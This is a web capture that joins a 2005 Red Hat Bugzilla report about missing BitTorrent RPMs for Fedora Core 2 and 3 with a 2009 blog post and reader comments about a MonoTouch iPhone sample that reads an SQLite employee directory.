Red Hat Bugzilla – Bug 157312 no torrent rpms for fc2 and fc3 Last modified: 2009-08-05 14:42:15 EDT From Bugzilla Helper: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3 Description of problem: It would be nice if the fedora distribution came with bittorrent since it's advertised on the fedora download page. If that's not possible, it would at least be nice if you provided rpms or at least links to trusted sites that had rpms for the current stable release. I could only find bittorrent rpms for legacy fedora releases on the "join the torrent" link at . I installed the rpm for fc1 on my fc3 machine and it didn't work. I had to search for the error I got: Traceback (most recent call last): File "/usr/bin/btdownloadcurses.py", line 7, in ? from BitTorrent.download import download ImportError: No module named BitTorrent.download And found somebody who had the same problem. After setting some python path, I had another problem... it didn't seem to accept the arguments to bittorrent that were recommened on the duke torrent web sit. So I tried getting rid of the max upload rate argument and it finally worked. But it shouldn't be that hard to download your releases using a tool you recommend on your download site IMHO. Version-Release number of selected component (if applicable): How reproducible: Always Steps to Reproduce: 1. Go to 2. Follow the link for "join the torrent" 3. Note the absense of torrent rpms for fc2 and fc3 Additional info: *** Bug 158197 has been marked as a duplicate of this bug. *** The most relevant page for Bittorrent (which is also linked from the Download page of the wiki) is currently: I have just added to the page that Bittorrent is available as a package from Extras. Closing bug as FIXED RAWHIDE. Tickets move to docs-request so the fedora-websites component can be removed per request from Ricky.
https://bugzilla.redhat.com/show_bug.cgi?id=157312
CC-MAIN-2018-30
refinedweb
348
65.42
SQLite.csand minor bugfixes. Firstly, let me begin by saying this sample totally relies on the contribution of Frank Krueger who posted the SQLClient.cscode to the MonoTouch mailing list Here is the code. Consider it released into the public domain. If there's interest, I can start a Google code project or something.Many thanks Frank! This is a VERY simple application using that library: it lists 'employees' from an SQLite database and allows you to call or email them: * note: may not adhere to iPhone user interface guidelines! The c# code itself can be downloaded (26Kb) or browsed below: This first sample only reads from SQLite on the iPhone - just a single database call using (var db = new SQLiteClient.SQLiteConnection("phonebook")) {which queries data that was set-up in the SQLite Database Browser and included with the application as a 'Content' file within the MonoTouch project. db.Open(); var users = db.Query ( "SELECT Firstname, Lastname, Work, Mobile, Department, Email FROM Phonebook ORDER BY Lastname" , 1000); listData = users.ToList(); } It uses UITableViewDelegate, UITableViewDataSourceand UIAlertViewDelegateimplementations to populate the scrolling list and react to touch 'events'. When you touch a row, we use the OpenUrlmethod discussed previously to trigger a call or email. Future additions to this sample might include alphabetized sections, search function and a proper 'user page' rather than using UIAlertView. Perhaps some hierarchical navigation and an online 'updater' function as well? p.s. yes, I shouldn't have used INTEGER for the telephone numbers in SQLite... they seem to be overflowing. I will convert them to TEXT in a future post.. We are planning to do a similar application for distribution within our company in 2010. We would be interested in following the development of the sample and potentially contributing to its development. Hey Tony, there'll be a few updates to this sample (I have some ideas) which will always be posted here or at conceptdevelopment.net. I'm getting the following error when running a variation of this code: Unhandled Exception: System.MissingMethodException: Method not found: 'Default constructor not found...ctor() of XactScope.Scope'. at System.Activator.CreateInstance (System.Type type, Boolean nonPublic) [0x00000] at System.Activator.CreateInstance (System.Type type) [0x00000] at System.Activator.CreateInstance[Scope] () [0x00000] at SQLiteClient.SQLiteCommand+<ExecuteQuery>c__Iterator0`1[XactScope.Scope].MoveNext () [0x00000] at System.Collections.Generic.List`1[XactScope.Scope].AddEnumerable (IEnumerable`1 enumerable) [0x00000] at System.Collections.Generic.List`1[XactScope.Scope]..ctor (IEnumerable`1 collection) [0x00000] at System.Linq.Enumerable.ToList[Scope] (IEnumerable`1 source) [0x00000] at XactScope.AppDelegate.FinishedLaunching (MonoTouch.UIKit.UIApplication app, MonoTouch.Foundation.NSDictionary options) [0x0005a] in /Users/carlmouritsen/Projects/XactScope/Main.cs:4900000] at MonoTouch.UIKit.UIApplication.Main (System.String[] args) [0x00000] at XactScope.Application.Main (System.String[] args) [0x00000] in /Users/carlmouritsen/Projects/XactScope/Main.cs:14 My Scope class has a default constructor. Any ideas what I'm doing wrong? Thanks. Is the XactScope.Scope default constructor actually referenced anywhere in the code? The monotouch compiler will optimise away methods that don't "appear" to be used. Check my Main.cs for some seemingly useless code: look for the comment beginning //System.MissingMethodException... This is my HACK to ensure the compiler doesn't optimise away my Employee class or any of it's getters/setters. Otherwise the compiler can't "see" them being used (since the only other place is via a generic class db.Query<Employee> but there are no explicit references to the constructor or properties in code). There are number of fixes for this: 1) my 'hack': just reference all the methods/properties manually (even as no-ops) so the compiler keeps them... this is my "first principles" approach in action :) 2) the MonoTouch team added an attribute to stop the compiler doing this - but I haven't tested it yet (and I'm not even sure if they ended up going with [Serializable] or [Preserve]) which you would need to decorate your class with 3) there is a switch you can pass to the compiler -linksdkonly in MonoDevelop under Options-iPhone Build-mtouch arguments (courtesy of @simongui). This tells the compiler not to optimize away stuff *your* code. HTH That was it. Thank you. Do you have an example of inserting into the phonebook using the SQLiteClient.cs? Craig, I tried your example, and although it works, the Application Output gives an error which looks like... 'CorporateDirectoy1(904,0x...) malloc: ***error for object 0x...: pointer being freed was not allocated' I adapted some of the code for use in an application i'm developing, and found I didn't have that problem, so I ignored it until upgrading to Snow Leopard and the latest release of the iPhone SDK, at whcih point my app gives me a shed load of those messages and so does your sample. Which is unfortunate. I was wondering if you could offer any advice? @Owen Hadn't noticed that - next time I run up that project I'll look into it. Did you notice whether it happens on both the simulator and device (or just one of them)? @Quan - will look at adding some more SQL operations to the example. @Craig Unfortunately I don't have an iPhone yet, i'm still awaiting delivery, so I've only been able to test on the simulator Do you have an example that uses a SearchBar with the UISearchDisplayController? i.e. wanting to search through the phone book for a specific person. pardon my stupidity, I'm getting an error "table not found". I have added the sqlite file to the the project directory, the part I don't get is "included with the application as a 'Content' file within the MonoTouch project.", how do you do that?? I'm new to monodevelop... @grant - not yet, but it is something I've been thinking about adding. Frank has released a cleaned up, feature added version of the Sqlite wrapper which you might like to try. @eddie - Make sure the file is 'in' your project structure (ie. right-click on the project file-Add Files...) then select the file and go to the Properties window and in the Build Action property select "Content". Is there a reason why my app can't run Update SQL on a device, but it can in the simulator? Ian - perhaps you could share the exact error you are seeing (both the code you've written and the Output from MonoDevelop). Are you using the _latest_ version of Frank's code? It is difficult to comment further without some concrete information on your implementation. much later then the last post, but have also a question. Everything works, I can return all my (3) records out of a table in my database, but then I receive 9times a " .... malloc: *** error for object 0xb346800: pointer being freed was not allocated" , everytime an other object.. What to do? edit last post: it happens on rule 40 of SQLiteCommand " cols[i] = MatchColProp (SQLite3.ColumnName (stmt, i), props); " have no idea how to fix this? Hi there, this code is very old - looks like it doesn't behave nicely with the latest version of MonoTouch. I'm going to upload a new version, but to fix for yourself: 1) get the latest SQLite code from and update the namespace to match 2) remove the .Open() methods - they're no longer required 3) in Main.cs add fields for the delegates EmployeeDataSource dataSource; EmployeeListDelegate @delegate; UIAlertViewDelegate alertDelegate; 4) in Main.cs FinishedLaunching set the delegates and use the variables instead dataSource = new EmployeeDataSource(this); @delegate = new EmployeeListDelegate(this); tableviewEmployee.DataSource = dataSource; tableviewEmployee.Delegate = @delegate; alertDelegate = new CallAlert (this); Good luck. I'll update the post when I get the new code uploaded. thx for the answer, but still have some issues. 1) I use this code in stead of the big one you showed me. I'm not using mapping so your file looked much better for me. 2) I'm only yet testing in the console. So no gui elements, only on the console. So I guess my fault could not be in this as well. It only returns this pointer being freed was not allocated when I'm debugging and when I get to this line of code.. The SQLite.cs code you are using is from 2009 - it's almost 3 years old - you should update to the latest code. I updated the sqlite code I found here on your page and changed here and there some code in comparisation with this you gave me in previous post. Every thing works now without that little b*st*rd of a pointer error :D Thanks for your time and responses!
http://conceptdev.blogspot.com/2009/09/monotouch-with-sqlite-corporate.html
CC-MAIN-2017-04
refinedweb
1,445
57.87